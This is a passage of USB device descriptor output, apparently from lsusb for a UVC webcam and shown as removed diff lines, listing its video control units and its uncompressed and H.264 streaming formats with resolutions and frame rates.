-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength          214
-        dwClockFrequency      300.000000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                18
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  3
-        bmControls           0x00020a2e
-          Auto-Exposure Mode
-          Auto-Exposure Priority
-          Exposure Time (Absolute)
-          Focus (Absolute)
-          Zoom (Absolute)
-          PanTilt (Absolute)
-          Focus, Auto
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 3
-        bSourceID               1
-        wMaxMultiplier      16384
-        bControlSize            2
-        bmControls     0x0000175b
-          Brightness
-          Contrast
-          Saturation
-          Sharpness
-          White Balance Temperature
-          Backlight Compensation
-          Gain
-          Power Line Frequency
-          White Balance Temperature, Auto
-        iProcessing             0 
-        bmVideoStandards     0x1b
-          None
-          NTSC - 525/60
-          SECAM - 625/50
-          NTSC - 625/50
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 6
-        guidExtensionCode         {d09ee423-7811-314f-ae52-d2fb8a8d3b48}
-        bNumControl            10
-        bNrPins                 1
-        baSourceID( 0)          3
-        bControlSize            2
-        bmControls( 0)       0xff
-        bmControls( 1)       0x03
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 8
-        guidExtensionCode         {e48e6769-0f41-db40-a850-7420d7d8240e}
-        bNumControl             7
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            2
-        bmControls( 0)       0x3b
-        bmControls( 1)       0x03
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 9
-        guidExtensionCode         {a94c5d1f-11de-8744-840d-50933c8ec8d1}
-        bNumControl            17
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            3
-        bmControls( 0)       0xf3
-        bmControls( 1)       0xff
-        bmControls( 2)       0x23
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                10
-        guidExtensionCode         {1502e449-34f4-fe47-b158-0e885023e51b}
-        bNumControl             7
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            2
-        bmControls( 0)       0xaa
-        bmControls( 1)       0x07
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                11
-        guidExtensionCode         {212de5ff-3080-2c4e-82d9-f587d00540bd}
-        bNumControl             2
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            2
-        bmControls( 0)       0x00
-        bmControls( 1)       0x41
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                12
-        guidExtensionCode         {41769ea2-04de-e347-8b2b-f4341aff003b}
-        bNumControl            11
-        bNrPins                 1
-        baSourceID( 0)          3
-        bControlSize            2
-        bmControls( 0)       0x07
-        bmControls( 1)       0x7f
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             4
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               3
-        iTerminal               0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x83  EP 3 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0040  1x 64 bytes
-        bInterval               8
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            16
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         3
-        wTotalLength                     2822
-        bEndPointAddress                  129
-        bmInfo                              0
-        bTerminalLink                       4
-        bStillCaptureMethod                 0
-        bTriggerSupport                     0
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-        bmaControls( 1)                    27
-        bmaControls( 2)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors               19
-        guidFormat                            {59555932-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 2 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                            90
-        dwMinBitRate                  1152000
-        dwMaxBitRate                  6912000
-        dwMaxVideoFrameBufferSize       28800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           180
-        dwMinBitRate                  4608000
-        dwMaxBitRate                 27648000
-        dwMaxVideoFrameBufferSize      115200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            432
-        wHeight                           240
-        dwMinBitRate                  8294400
-        dwMaxBitRate                 49766400
-        dwMaxVideoFrameBufferSize      207360
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           448
-        dwMinBitRate                 28672000
-        dwMaxBitRate                172032000
-        dwMaxVideoFrameBufferSize      716800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                184320000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         416666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            416666
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           1333333
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                159252480
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         416666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            416666
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           1333333
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            42
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  4
-        dwFrameInterval( 0)            666666
-        dwFrameInterval( 1)           1000000
-        dwFrameInterval( 2)           1333333
-        dwFrameInterval( 3)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            42
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           576
-        dwMinBitRate                 47185920
-        dwMaxBitRate                141557760
-        dwMaxVideoFrameBufferSize     1179648
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  4
-        dwFrameInterval( 0)            666666
-        dwFrameInterval( 1)           1000000
-        dwFrameInterval( 2)           1333333
-        dwFrameInterval( 3)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  3
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           1333333
-        dwFrameInterval( 2)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           896
-        dwMinBitRate                114688000
-        dwMaxBitRate                172032000
-        dwMaxVideoFrameBufferSize     2867200
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1333333
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1920
-        wHeight                          1080
-        dwMinBitRate                165888000
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize     4147200
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        18
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           2304
-        wHeight                          1296
-        dwMinBitRate                238878720
-        dwMaxBitRate                238878720
-        dwMaxVideoFrameBufferSize     5971968
-        dwDefaultFrameInterval        4999998
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           4999998
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        19
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           2304
-        wHeight                          1536
-        dwMinBitRate                283115520
-        dwMaxBitRate                283115520
-        dwMaxVideoFrameBufferSize     7077888
-        dwDefaultFrameInterval        4999998
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           4999998
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-      VideoStreaming Interface Descriptor:
-        bLength                            28
-        bDescriptorType                    36
-        bDescriptorSubtype                 16 (FORMAT_FRAME_BASED)
-        bFormatIndex                        2
-        bNumFrameDescriptors               17
-        guidFormat                            {48323634-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 2 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-          bVariableSize                     1
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                            90
-        dwMinBitRate                  1152000
-        dwMaxBitRate                  6912000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           180
-        dwMinBitRate                  4608000
-        dwMaxBitRate                 27648000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            432
-        wHeight                           240
-        dwMinBitRate                  8294400
-        dwMaxBitRate                 49766400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           448
-        dwMinBitRate                 28672000
-        dwMaxBitRate                172032000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                230400000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                199065600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                331776000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           576
-        dwMinBitRate                 47185920
-        dwMaxBitRate                283115520
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                442368000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           896
-        dwMinBitRate                114688000
-        dwMaxBitRate                688128000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1920
-        wHeight                          1080
-        dwMinBitRate                165888000
-        dwMaxBitRate                995328000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
